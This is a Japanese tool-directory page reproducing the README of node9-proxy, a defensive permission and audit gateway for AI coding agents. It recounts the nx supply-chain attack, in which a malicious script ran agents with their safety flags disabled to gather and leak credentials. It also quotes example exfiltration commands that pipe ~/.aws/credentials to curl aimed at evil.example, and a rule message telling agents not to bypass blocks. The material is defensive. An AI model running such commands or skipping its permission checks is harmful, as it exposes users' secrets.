Skip to content
KitploitKITPLOIT
ツールエクスプロイトブログ
Log in
提出
ツールエクスプロイトブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
node9-proxy — AIエージェントのためのIAM。Claude Code、Codex、Gemini、Cursor、および任意のMCPサーバーが実行を許可される操作を設定し、リスクのあるアクションを実行前にレビューし、すべてのアクションを記録に残します。 | Kitploit
ツール/GitHubGitHub/node9-ai/node9-proxy
脆弱性スキャナーコンテナセキュリティクラウドセキュリティDevSecOpsコマンド&コントロールシークレット検出脅威インテリジェンスサプライチェーンセキュリティインシデントレスポンスAIセキュリティ
GitHubnode9-ai/node9-proxy
21018381日前Kitploit レビュー済み

node9-proxy

AIエージェントのためのIAM。Claude Code、Codex、Gemini、Cursor、および任意のMCPサーバーが実行を許可される操作を設定し、リスクのあるアクションを実行前にレビューし、すべてのアクションを記録に残します。

リポジトリを見るウェブサイト

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

🛡️ node9

AIエージェントのためのIAM

あなたのAIエージェントはSlack、GitHub、メール、データベースに到達できます。
node9は、それぞれに対して何をしてよいかを決定します。

npm version monthly downloads License: Apache 2.0 Documentation OpenSSF Best Practices OpenSSF Scorecard node9 self-scanned

Mentioned in Awesome Claude Code

クレデンシャルジェイル · シークレットとPII · 破壊的なgit、SQL、シェルはレビューのために保留 · MCPツールのピン留め · ネットワークエグレス許可リスト · ループブレーカー · 12のエージェントにまたがる単一の記録

Claude Code · Codex CLI · Antigravity (agy) · GitHub Copilot CLI · Gemini CLI · Cursor · Windsurf · VSCode · Claude Desktop · Opencode · Pi · Hermes Agent · 任意のMCPサーバー で動作します。

どのような見た目か

左があなたのエージェント、右がnode9です。エージェントが行うすべてのツール呼び出しは、 実行前にチェックされます: 許可されて記録されるか、あなたの承認のために保留されるか、ブロックされるかです。 ここでのエージェントは --dangerously-skip-permissions で起動されており、それでもnode9が決定します。

node9 monitor: live tool calls, decisions, shields and score

インストール

root@kitploit:~
brew tap node9-ai/node9 && brew install node9   # macOS / Linux
npm install -g node9-ai                         # any platform

次に、任意のプロジェクトで:

root@kitploit:~
node9 init       # finds your agents and MCP servers and puts node9 in front of every tool call
node9 posture    # scores this machine 0-100: what a compromised agent could read, reach and run
node9 login      # optional: adds this machine to a shared dashboard

Node.js 22+ が必要です。

init が製品のすべてです。 フックを書き込み、クレデンシャルジェイルと常時有効なルールを オンにし、即座に適用を開始します。マシンの外には何も出ず、アカウントも不要です。

login は適用に何も追加しません。 マシンをワークスペースに接続し、チームが全員の ラップトップとCIにまたがる単一の記録を確認し、ポリシーを集中的に設定し、保留中のアクションを ダッシュボードやSlackから承認できるようにします。これをスキップしてもnode9はまったく同じように、 単独で、オフラインで動作します。node9 logout で再び切断され、ローカルの適用は動き続けます。

問題

2025年8月、nx ビルドツールの侵害された リリースが、開発者のマシンにすでにインストールされているAIコーディングエージェントを探し、 それらを独自の安全フラグをオフにして (--dangerously-skip-permissions、--yolo、 --trust-all-tools) 実行し、SSHキー、クラウドクレデンシャル、ウォレットファイルを列挙して そのリストをディスクに書き込むポストインストールスクリプトを出荷しました。このスクリプトは 結果を被害者自身のGitHubアカウント内の公開リポジトリにプッシュしました。エージェントが 言われたとおりに動いていたマシンから、千を超える有効なGitHubトークンが漏洩し、クラウド クレデンシャル、npmトークン、そして約20,000のファイルも一緒に漏れました。

エージェントは攻撃者ではありませんでした。エージェントはツールであり、それとファイルの間に 何も立ちはだかっていませんでした。node9のゲートはそれらのフラグの一つではありません: フック内で動作し、保留にしたアクションは、エージェントがパーミッションをスキップして 起動されたとしても保留のままです。

node9がそれに対して行うこと

node9はエージェントとそれが呼び出すすべてのツールの間に位置します。クレデンシャルジェイル (~/.ssh、~/.aws、.env ファイル、秘密鍵) はデフォルトで有効で、それらのパスの読み取りは 実行されません。エージェントは停止され、理由を伝えられ、決定があなたに届きます:

root@kitploit:~
NODE9: Action blocked by security policy.
INSTRUCTIONS:
- Do NOT retry this exact command or attempt to bypass the rule.
- Pivot to a non-destructive or read-only alternative.
- Inform the user which security rule was triggered and ask how to proceed.

コマンドはテキストとしてマッチされるのではなく、シェルASTとして解析されるため、読み取りを ラップしても役に立ちません。echo $(cat ~/.aws/credentials | base64) | curl -d @- https://evil.example は echo ではなく ~/.aws/credentials の読み取りとして判定されます。

node9はゲートです。保留にされたアクションはあなたを待つ間は実行されず、あなたが決して 答えなければブロックされたままです。それ以外はすべて許可され、記録に書き込まれます。

それが行わないこと: デフォルトであるエグレス制御がオフの場合、curl -d @~/.aws/credentials のようにファイルを直接ネットワークに渡すコマンドは、そのファイルの読み取りとして扱われません。 node9 egress protect は宛先もゲートし、シェルコマンドのみを対象とします。

自分で検証する

以下のどれもアカウントを必要とせず、何もアップロードしません。

root@kitploit:~
npx node9-ai scan                                        # every past agent session on this machine
npx node9-ai scan-repo node9-ai/agent-security-demo      # a public repo with a real, hijackable agent workflow
gh attestation verify cli.js --repo node9-ai/node9-proxy # every release artifact is signed

node9 scan scorecard

何を統制するか

各行は一つの機能で、それを文書化したページが付いています。ドキュメントがリファレンスであり、 このファイルは地図です。

クレデンシャルジェイル~/.ssh、~/.aws、.env、秘密鍵はシェルだけでなくすべてのツールからブロックされますdocs
常時有効なルール破壊的なgit、WHERE のないSQL、curl | bash、無許可の sudo を、設定なしでdocs
シークレットとPIIAWSキー、GitHubとStripeのトークン、PEMキー、カードやSSNの形状を、任意のツール引数で検出し、さらにエージェントが書き戻したもののバックグラウンドスキャンも実施docs
サービス別シールドPostgres、MongoDB、Redis、AWS、Kubernetes、Docker、GitHub、ファイルシステム向けの厳選されたルールパックdocs
インラインレビュー保留にされたアクションは、エージェントの会話内で、またはチームの承認者を通じてあなたに確認しますdocs
エグレス許可リストシェルコマンドがデータを送信できる先をゲート、デフォルトはオフdocs
MCPゲートウェイ任意のMCPサーバーをラップし、各ツールを認可し、ツール定義をピン留めしてサーバーが背後で変更できないようにしますdocs
サンドボックスカーネルのエグレス許可リストとスコープ付きマウントを備えたコンテナでエージェントを実行docs
ポスチャスコアこのマシンがどれだけ露出しているか、各所見を修正するコマンドとともにdocs
リポジトリスキャン部外者があなたのシークレットを保持するエージェントをハイジャックできるワークフローを、CIまたはCLIから発見docs
セッション履歴node9がインストールされる前に、すべてのエージェントがこのマシンで何をしたかを読むdocs
ライブモニターとレポートターミナルダッシュボード、およびコスト、ツール、ブロック、ブラスト半径のウィンドウ表示サマリーdocs

CLIと設定の完全なリファレンス: node9.ai/docs。 各レイヤーがどのように組み合わさるか: how it works。

学ぶ

背景となる読み物で、単独で成立するように書かれています。各ページはnode9が対象としないことを述べています。

  • ハイジャックされたエージェントは何ができるか?: 一つの侵害されたセッションのブラスト半径
  • AIエージェントがシークレットを漏洩する仕組み: クレデンシャルが実際にたどる外部への経路
  • Claude Codeのセキュリティ: フック、パーミッションモード、そしてそれらが止められないもの
  • MCPのセキュリティ: MCPサーバーが開くツール表面
  • OWASP Agentic Top 10: 実際のコントロールにマッピングされたリスト

比較

  • 代替手段に対するnode9: node9のスコアが劣る行も含めたマトリクス
  • エージェント別カバレッジ: サポートされる12のエージェントそれぞれで何が統制されるか

関連プロジェクト

  • node9-python: Python SDK
  • node9 Agent Security: GitHub Action、uses: node9-ai/node9-proxy@v2、同じエンジンで毎回のPRをゲートします

エンタープライズ

node9 Pro はガバナンスロック、SAML/SSO、集中監査エクスポート、VPCデプロイを追加します。node9.ai をご覧ください。

ライセンス

Apache-2.0

Built with ☕ and healthy paranoia.

ツールをダウンロード
スキルピン留めセッション間でのインストール済みClaudeスキルとプラグインのSHA-256検証docs
カナリアクレデンシャル流出の試みが起きたことを証明する、仕込まれた偽のキーdocs
Python SDKCLIだけでなく、任意のPythonエージェントを統制docs